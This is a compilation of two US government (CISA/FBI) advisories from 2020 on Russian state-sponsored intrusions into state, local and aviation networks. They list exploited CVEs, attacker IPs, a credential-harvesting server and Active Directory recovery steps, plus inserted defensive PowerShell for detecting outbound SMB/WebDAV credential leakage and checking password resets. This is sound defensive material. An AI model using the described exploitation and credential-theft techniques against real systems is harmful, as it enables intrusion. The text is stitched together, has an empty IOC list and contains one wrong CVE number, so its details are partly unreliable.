It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

Contact CISA or law enforcement immediately

To report an intrusion and to request incident response resources or technical assistance, contact CISA (Central@cisa.dhs.gov or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (CyWatch@ic.fbi.gov or 855-292-3937).

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

Revisions
  • October 22, 2020: Initial Version


October 22, 2020

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets

Original release date: October 22, 2020
Summary

This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations.

Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.

The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:

  • Sensitive network configurations and passwords.
  • Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).
  • IT instructions, such as requesting password resets.
  • Vendors and purchasing information.
  • Printing access badges.

To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.

As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.

  • Click here for a PDF version of this report.
  • Click here for a STIX package of IOCs.
Technical Details

The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses 213.74.101[.]65, 213.74.139[.]196, and 212.252.30[.]170 to connect to victim web servers (Exploit Public Facing Application [T1190]).

The actor is using 213.74.101[.]65 and 213.74.139[.]196 to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (Brute Force [T1110]; Exploit Public Facing Application [T1190]). The APT actor also hosted malicious domains, including possible aviation sector target columbusairports.microsoftonline[.]host, which resolved to 108.177.235[.]92 and [cityname].westus2.cloudapp.azure.com; these domains are U.S. registered and are likely SLTT government targets (Drive-By Compromise [T1189]).

The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (CVE-2019-19781) and a Microsoft Exchange remote code execution flaw (CVE-2020-0688).

The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE-2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003].

Between early February and mid-September, these APT actors used 213.74.101[.]65, 212.252.30[.]170, 5.196.167[.]184, 37.139.7[.]16, 149.56.20[.]55, 91.227.68[.]97, and 5.45.119[.]124 to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (Valid Accounts [T1078]).

Indicators of Compromise

The APT actor used the following IP addresses and domains to carry out its objectives:


IP address 51.159.28[.]101 appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address 51.159.28[.]101 (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).

Organizations should check available logs for traffic to/from IP address 51.159.28[.]101 for indications of credential-harvesting activity. As the APT actors have likely established, or will establish, additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.
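As an added example (not from the advisory), PowerShell detection logic for the egress monitoring recommended here: it parses constructed Windows Firewall (pfirewall.log) and proxy log lines, flags SMB/NetBIOS to non-private addresses, WebDAV to external hosts, and any traffic involving 51.159.28[.]101. The function names and the proxy log layout are assumptions of this example.

```powershell
# Added example, not from the advisory. Flags outbound SMB/NetBIOS and WebDAV
# traffic to non-private addresses, plus any traffic involving the IP the
# advisory names as a credential collector. Log lines below are constructed
# samples in the Windows Firewall (pfirewall.log) field order and in a
# simplified proxy layout assumed for this example.
$CredentialCollectorIPs = @('51.159.28.101')   # from the advisory, refanged

function Test-PrivateIPv4 {
    param([string]$Address)
    $ip = $null
    if (-not [System.Net.IPAddress]::TryParse($Address, [ref]$ip) -or
        $ip.AddressFamily -ne 'InterNetwork') { return $false }
    $b = $ip.GetAddressBytes()
    return ($b[0] -eq 10) -or
           ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
           ($b[0] -eq 192 -and $b[1] -eq 168) -or
           ($b[0] -eq 127) -or
           ($b[0] -eq 169 -and $b[1] -eq 254)
}

function Find-SuspiciousEgress {
    param([string[]]$FirewallLines, [string[]]$ProxyLines)
    $alerts = [System.Collections.Generic.List[object]]::new()
    function Add-Alert([string]$Reason, [string]$Src, [string]$Dst, [string]$Detail) {
        $alerts.Add([pscustomobject]@{ Reason = $Reason; Source = $Src; Destination = $Dst; Detail = $Detail })
    }

    # pfirewall.log fields: date time action protocol src-ip dst-ip src-port dst-port ...
    foreach ($line in $FirewallLines) {
        if ($line -match '^\s*(#|$)') { continue }          # header / blank
        $f = $line -split '\s+'
        if ($f.Count -lt 8 -or $f[7] -notmatch '^\d+$') { continue }
        $proto, $src, $dst, $dport = $f[3], $f[4], $f[5], [int]$f[7]
        $smb = ($proto -eq 'TCP' -and $dport -in @(139, 445)) -or
               ($proto -eq 'UDP' -and $dport -eq 137)
        if ($src -in $CredentialCollectorIPs -or $dst -in $CredentialCollectorIPs) {
            Add-Alert 'KnownCollectorIP' $src $dst "$proto/$dport"
        } elseif ($smb -and -not (Test-PrivateIPv4 $dst)) {
            Add-Alert 'ExternalSMB' $src $dst "$proto/$dport"
        }
    }

    # Proxy lines (assumed layout): date time src dst method url "user-agent".
    # The Windows WebDAV redirector identifies itself as Microsoft-WebDAV-MiniRedir.
    foreach ($line in $ProxyLines) {
        if ($line -match '^\S+ \S+ (?<src>\S+) (?<dst>\S+) (?<method>\S+) (?<url>\S+) "(?<ua>[^"]*)"') {
            $webdav = $Matches.ua -like 'Microsoft-WebDAV-MiniRedir*' -or $Matches.method -eq 'PROPFIND'
            if ($webdav -and -not (Test-PrivateIPv4 $Matches.dst)) {
                Add-Alert 'ExternalWebDAV' $Matches.src $Matches.dst "$($Matches.method) $($Matches.url)"
            }
        }
    }
    return $alerts
}

# Constructed sample input; 203.0.113.9 and 198.51.100.7 are documentation addresses.
$SampleFirewallLog = @(
    '#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path',
    '2020-10-01 14:22:03 ALLOW TCP 10.0.0.15 51.159.28.101 49832 445 0 - 0 0 0 - - - SEND',  # advisory IP
    '2020-10-01 14:22:07 ALLOW TCP 10.0.0.15 10.0.0.4 49833 445 0 - 0 0 0 - - - SEND',       # internal SMB
    '2020-10-01 14:23:11 ALLOW UDP 10.0.0.22 203.0.113.9 137 137 78 - - - - - - - SEND',     # NetBIOS out
    '2020-10-01 14:24:40 ALLOW TCP 10.0.0.22 198.51.100.7 49900 443 0 - 0 0 0 - - - SEND'    # ordinary HTTPS
)
$SampleProxyLog = @(
    '2020-10-01 14:25:02 10.0.0.22 198.51.100.7 PROPFIND http://198.51.100.7/share/ "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '2020-10-01 14:25:09 10.0.0.22 198.51.100.7 GET http://198.51.100.7/ "Mozilla/5.0"'
)

Find-SuspiciousEgress -FirewallLines $SampleFirewallLog -ProxyLines $SampleProxyLog |
    Format-Table -AutoSize
```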

Refer to AA20-296A.stix for a downloadable copy of IOCs.

Network Defense-in-Depth

Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.

  • Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE-2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.

Table 1: Patch information for CVEs

CVE-2019-19781
  Vulnerable products:
  • Citrix Application Delivery Controller
  • Citrix Gateway
  • Citrix SDWAN WANOP
  Patch information:
  • Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0
  • Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3
  • Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0
  • Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5

CVE-2020-0688
  Vulnerable products:
  • Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
  • Microsoft Exchange Server 2013 Cumulative Update 23
  • Microsoft Exchange Server 2016 Cumulative Update 14
  • Microsoft Exchange Server 2016 Cumulative Update 15
  • Microsoft Exchange Server 2019 Cumulative Update 3
  • Microsoft Exchange Server 2019 Cumulative Update 4
  Patch information:
  • Microsoft Security Advisory for CVE-2020-0688

CVE-2019-10149
  Vulnerable products:
  • Exim versions 4.87–4.91
  Patch information:
  • Exim page for CVE-2019-10149

CVE-2018-13379
  Vulnerable products:
  • FortiOS 6.0: 6.0.0 to 6.0.4
  • FortiOS 5.6: 5.6.3 to 5.6.7
  • FortiOS 5.4: 5.4.6 to 5.4.12
  Patch information:
  • Fortinet Security Advisory: FG-IR-18-384

CVE-2020-1472
  Vulnerable products:
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)
  Patch information:
  • Microsoft Security Advisory for CVE-2020-1472

  • Follow Microsoft’s guidance on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.
  • If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on SMB Security Best Practices for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in:
  • Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and WINDOWS folders. All other locations should be disallowed unless an exception is granted.
  • Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions for validity.
Comprehensive Account Resets

For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized guidance for this. Such a reset should be performed very carefully if needed.

If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premises—as well as in Azure-hosted—AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

  1. Create a temporary administrator account, and use this account only for all administrative actions
  2. Reset the Kerberos Ticket Granting Ticket (krbtgt) password;[1] this must be completed before any additional actions (a second reset will take place in step 5)
  3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
  5. Reset the krbtgt password again
  6. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  7. Reboot domain controllers
  8. Reboot all endpoints

The following accounts should be reset:

  • AD Kerberos Authentication Master (2x)
  • All Active Directory Accounts
  • All Active Directory Admin Accounts
  • All Active Directory Service Accounts
  • All Active Directory User Accounts
  • DSRM Account on Domain Controllers
  • Non-AD Privileged Application Accounts
  • Non-AD Unprivileged Application Accounts
  • Non-Windows Privileged Accounts
  • Non-Windows User Accounts
  • Windows Computer Accounts
  • Windows Local Admin

VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Software Updates and Securing Network Infrastructure Devices. Wherever possible, enable automatic updates.
  • Implement MFA on all VPN connections to increase security. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:

  • Audit configuration and patch management programs.
  • Monitor network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).
  • Implement MFA, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Keep software up to date. Enable automatic updates, if available.

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

DISCLAIMER

This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Revisions
  • October 22, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

October 9, 2020

AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

Original release date: October 9, 2020
Summary

This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

Note: the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.

This joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). 

CISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability—CVE-2020-1472—in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. 

This recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.

CISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.

Some common tactics, techniques, and procedures used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical CVE-2020-1472 Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability CVE-2018-13379 has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability CVE-2020-15505. While these exploits have been observed recently, this activity is ongoing and still unfolding. CISA recommends network staff and administrators review internet-facing infrastructure for vulnerabilities, including Juniper CVE-2020-1631, Pulse Secure CVE-2019-11510,  Citrix NetScaler CVE-2020-19781, and Palo Alto Networks CVE-2020-2021 (this list is not considered exhaustive).

After gaining initial access, the actors exploit CVE-2020-1472 to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors, and is not limited to SLTT entities.

Technical Details

Initial Access

APT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (Exploit Public-Facing Application [T1190], External Remote Services [T1133]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability CVE-2018-13379; however, other vulnerabilities, listed below, have been observed (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive).

  • Citrix NetScaler CVE-2020-19781
  • MobileIron CVE-2020-15505
  • Pulse Secure CVE-2019-11510
  • Palo Alto Networks CVE-2020-2021
  • F5 BIG-IP CVE-2020-5902

FortiGuard FortiOS SSL VPN CVE-2018-13379

CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.

MobileIron Core & Connector Vulnerability CVE-2020-15505

CVE-2020-15505 is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Privilege Escalation

After initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging open-source tools such as Mimikatz and CrackMapExec to obtain Valid Account [T1078] credentials from AD servers.

Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472

CVE-2020-1472 is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory. This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (Valid Accounts: Domain Accounts [T1078.002]). Malicious actors can leverage this vulnerability to compromise other devices on the network (Lateral Movement [TA0008]).

Persistence

Once system access has been achieved, the APT actors use abuse of legitimate credentials (Valid Account [T1078]) to log in via VPN or Remote Access Services [T1133] to maintain persistence.

Mitigations

Organizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an “assume breach” mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.

Keep Systems Up to Date

Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.

Table 1: Patch information for exploited CVEs

Vulnerability | Vulnerable Products | Patch Information

CVE-2018-13379
  • FortiOS 6.0
  • FortiOS 5.6
  • FortiOS 5.4

CVE-2019-19781
  • Citrix Application Delivery Controller
  • Citrix Gateway
  • Citrix SDWAN WANOP

CVE-2020-5902
  • Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)

CVE-2019-11510
  • Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15
  • Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15

CVE-2020-15505
  • MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0
  • Sentry versions 9.7.2 and earlier, and 9.8.0
  • Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier

CVE-2020-1631
  • Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1

CVE-2020-2021
  • PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)

CVE-2020-1472
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Comprehensive Account Resets

If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premises as well as Azure-hosted AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

  1. Create a temporary administrator account, and use this account only for all administrative actions
  2. Reset the Kerberos Ticket Granting Ticket (krbtgt) password; this must be completed before any additional actions (a second reset will take place in step 5)
  3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
  5. Reset the krbtgt password again
  6. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  7. Reboot domain controllers
  8. Reboot all endpoints

The following accounts should be reset:

  • AD Kerberos Authentication Master (2x)
  • All Active Directory Accounts
  • All Active Directory Admin Accounts
  • All Active Directory Service Accounts
  • All Active Directory User Accounts
  • DSRM Account on Domain Controllers
  • Non-AD Privileged Application Accounts
  • Non-AD Unprivileged Application Accounts
  • Non-Windows Privileged Accounts
  • Non-Windows User Accounts
  • Windows Computer Accounts
  • Windows Local Admin
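As an added example that is not part of the advisory, the PowerShell below gives two checks that support the reset steps above (the same steps appear in the preceding advisory): one confirms that a krbtgt reset has replicated to every domain controller before the next step is taken (steps 3 and 6), the other lists accounts whose password has not been changed since the reset window opened (step 4). It assumes the RSAT ActiveDirectory module and a domain-admin session; the function names are ours.

```powershell
# Added example, not from the advisory. Requires the RSAT ActiveDirectory
# module and a session that can read every domain controller directly.
Import-Module ActiveDirectory

function Get-KrbtgtResetState {
    # Steps 3 and 6: read pwdLastSet for krbtgt from each DC (not from a
    # single replica) and report whether all DCs agree on the timestamp.
    param([string]$Domain = (Get-ADDomain).DNSRoot)

    $perDc = foreach ($dc in Get-ADDomainController -Filter * -Server $Domain) {
        $krbtgt = Get-ADUser -Identity krbtgt -Properties pwdLastSet -Server $dc.HostName
        [pscustomobject]@{
            DomainController = $dc.HostName
            KrbtgtPwdLastSet = [DateTime]::FromFileTimeUtc($krbtgt.pwdLastSet)
        }
    }
    $distinct = @($perDc.KrbtgtPwdLastSet | Sort-Object -Unique)
    [pscustomobject]@{
        Domain      = $Domain
        Controllers = $perDc
        # True only when every DC reports the same pwdLastSet, i.e. the
        # reset has propagated and the next step can proceed.
        Replicated  = ($distinct.Count -eq 1)
    }
}

function Get-AccountsNotResetSince {
    # Step 4: list user, service and computer accounts whose password has
    # not been set since the reset began. pwdLastSet=0 ("must change at next
    # logon") is not a completed reset, so those objects are included too.
    param(
        [Parameter(Mandatory)][DateTime]$Since,
        [string]$Domain = (Get-ADDomain).DNSRoot
    )
    # pwdLastSet is a Windows FILETIME, so the cutoff is converted and the
    # comparison is done server-side in the LDAP filter.
    $cutoff = $Since.ToFileTimeUtc()
    # Computer objects derive from the user class, so objectClass=user
    # covers users, service accounts and machine accounts alike.
    $ldap = "(&(objectClass=user)(pwdLastSet<=$cutoff))"
    Get-ADObject -LDAPFilter $ldap -Properties sAMAccountName, pwdLastSet -Server $Domain |
        Select-Object sAMAccountName, ObjectClass,
            @{ n = 'PwdLastSet'; e = { [DateTime]::FromFileTimeUtc($_.pwdLastSet) } }
}

# Usage (values are placeholders): run after each krbtgt reset, and after the
# bulk reset with the time the reset window opened.
# $state = Get-KrbtgtResetState
# $state.Controllers | Format-Table -AutoSize
# if (-not $state.Replicated) { Write-Warning 'krbtgt reset not yet on all DCs' }
# Get-AccountsNotResetSince -Since (Get-Date '2020-10-09 08:00') | Format-Table -AutoSize
```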

VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices. Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.
  • Implement multi-factor authentication (MFA) on all VPN connections to increase security. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. How to protect your organization against VPN vulnerabilities:

  • Audit configuration and patch management programs.
  • Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).
  • Implement MFA, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Keep software up to date. Enable automatic updates, if available.

To secure your organization’s Netlogon channel connections:

  • Update all Domain Controllers and Read Only Domain Controllers. On August 11, 2020, Microsoft released software updates to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).
  • Monitor for new events, and address non-compliant devices that are using vulnerable Netlogon secure channel connections.
  • Block public access to potentially vulnerable ports, such as 445 (SMB) and 135 (RPC).

To protect your organization against this CVE, follow advice from Microsoft, including:

  • Update your domain controllers with an update released August 11, 2020 or later.
  • Find which devices are making vulnerable connections by monitoring event logs.
  • Address non-compliant devices making vulnerable connections.
  • Enable enforcement mode to address CVE-2020-1472 in your environment.

How to Uncover and Mitigate Malicious Activity

  • Collect and remove for further analysis:
    • Relevant artifacts, logs, and data
  • Implement mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.
  • Consider soliciting incident response support from a third-party IT security organization to:
    • Provide subject matter expertise and technical support to the incident response,
    • Ensure that the actor is eradicated from the network, and
    • Avoid residual issues that could result in follow-up compromises once the incident is closed

Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

DISCLAIMER

